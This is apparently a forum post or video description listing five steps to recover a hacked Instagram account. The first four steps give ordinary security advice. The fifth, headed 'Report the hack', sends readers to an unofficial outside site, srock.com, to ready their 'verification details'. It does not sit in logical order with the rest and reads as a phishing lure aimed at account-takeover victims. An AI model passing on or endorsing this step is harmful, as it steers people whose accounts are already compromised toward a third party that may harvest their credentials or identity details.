I ran into this last week. Here's what fixed it for me. If your Instagram feed has been compromised, follow these steps to recover it. Step 1. Secure your account. Change your password immediately to prevent further unauthorized access. Go to your profile, tap on Settings, then Security, and select Password. Step 2. Enable two-factor authentication. Add an extra layer of security by enabling two-factor authentication. In Settings, go to Security and select two-factor authentication to set it up. Step 3. Check account activity. Review your account activity to identify any suspicious actions. In Settings, tap on Security, then Login Activity to see where your account has been accessed from. Step 4. Reclaim your content. If posts have been deleted or altered, check your archive to restore them. Tap on the 3 lines in the top right corner of your profile, then select Archive. Step 5. Report the hack. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Remember to keep your account secure moving forward. Stay vigilant and regularly update your security settings.